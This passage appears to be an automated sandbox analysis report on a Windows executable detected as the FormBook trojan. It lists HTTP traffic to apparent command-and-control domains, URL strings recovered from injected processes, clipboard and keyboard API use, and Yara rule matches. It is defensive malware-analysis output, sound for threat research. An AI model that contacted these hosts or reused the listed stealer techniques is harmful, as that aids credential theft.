            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 26 Aug 2024 16:29:20 GMTContent-Type: text/htmlContent-Length: 3971Connection: closeETag: "6526681e-f83"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 39 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 2c 68 65 6c 76 65 74 69 63 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 6c 69 6e 6b 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 35 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 36 65 6d 20 32 65 6d 20 30 2e 34 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=gIrdR1B1Q86dlX2I5Y9n; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 26-Aug-2025 16:29:34 GMTDate: Mon, 26 Aug 2024 16:29:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=qcu0yVM64DDVZF4bCVJ1; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 26-Aug-2025 16:29:37 GMTDate: Mon, 26 Aug 2024 16:29:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=fVu3sRgjivEndIImLJFH; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 26-Aug-2025 16:29:39 GMTDate: Mon, 26 Aug 2024 16:29:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=4zeL29F342mINNAYsAPa; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Tue, 26-Aug-2025 16:29:42 GMTDate: Mon, 26 Aug 2024 16:29:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"X-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000056B4000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003874000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2373155409.000000000AD44000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/css/print.css?ver=1.4
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/polyfills.js?ver=1.4
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/primary-navigation.js?ver=1.4
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js?ver=1.4
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/themes/twentytwentyone/style.css?ver=1.4
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-content/uploads/2021/09/fondo-plumber-1000x429-1.jpg
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mgmasistencia.com/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000061B2000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000004372000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nginx.net/
            Source: EsAzcOtjoknfjP.exe, 00000008.00000002.3521236665.0000000005965000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ayypromo.shop
            Source: EsAzcOtjoknfjP.exe, 00000008.00000002.3521236665.0000000005965000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ayypromo.shop/rgqx/
            Source: EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000004372000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.redhat.com/
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000061B2000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000004372000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.redhat.com/docs/manuals/enterprise/
            Source: EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.00000000041E0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.xforum.tech/647x/?3L9l=FnaXBox54
            Source: rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
            Source: rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://es.wordpress.org/
            Source: rasdial.exe, 00000006.00000002.3518674647.0000000003074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: rasdial.exe, 00000006.00000002.3518674647.0000000003074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: rasdial.exe, 00000006.00000002.3518674647.0000000003074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: rasdial.exe, 00000006.00000002.3518674647.0000000003074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: rasdial.exe, 00000006.00000002.3518674647.0000000003074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033du
            Source: rasdial.exe, 00000006.00000002.3518674647.0000000003074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: rasdial.exe, 00000006.00000002.3518674647.0000000003074000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: rasdial.exe, 00000006.00000003.2261768573.0000000007DCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/2021/08/30/hola-mundo/
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/2021/08/30/hola-mundo/#comment-1
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/acerca-de/
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/blog/
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/comments/feed/
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/contacto/
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/feed/
            Source: EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/wp-json/
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://mgmasistencia.com/xmlrpc.php?rsd
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000064D6000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000004696000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://tilda.cc
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/wordpress
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://wordpress.org/
            Source: rasdial.exe, 00000006.00000002.3521925818.0000000007DEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: rasdial.exe, 00000006.00000002.3520253093.00000000059D8000.00000004.10000000.00040000.00000000.sdmp, EsAzcOtjoknfjP.exe, 00000008.00000002.3519850333.0000000003B98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/explore/tags/wordcamp/
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000EEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_000EEAFF
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000EED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_000EED6A
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000EEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_000EEAFF
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_000DAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_000DAA57
            Source: C:\Users\user\Desktop\031215-Revised-01.exeCode function: 0_2_00109576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00109576

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.2680000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.2680000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3521236665.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3519634972.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3518320183.0000000002BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2081915749.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3519666163.0000000002DE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2082567051.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.2680000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.2680000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.2082509360.0000000003450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.3519693781.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3521236665.00000000058C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
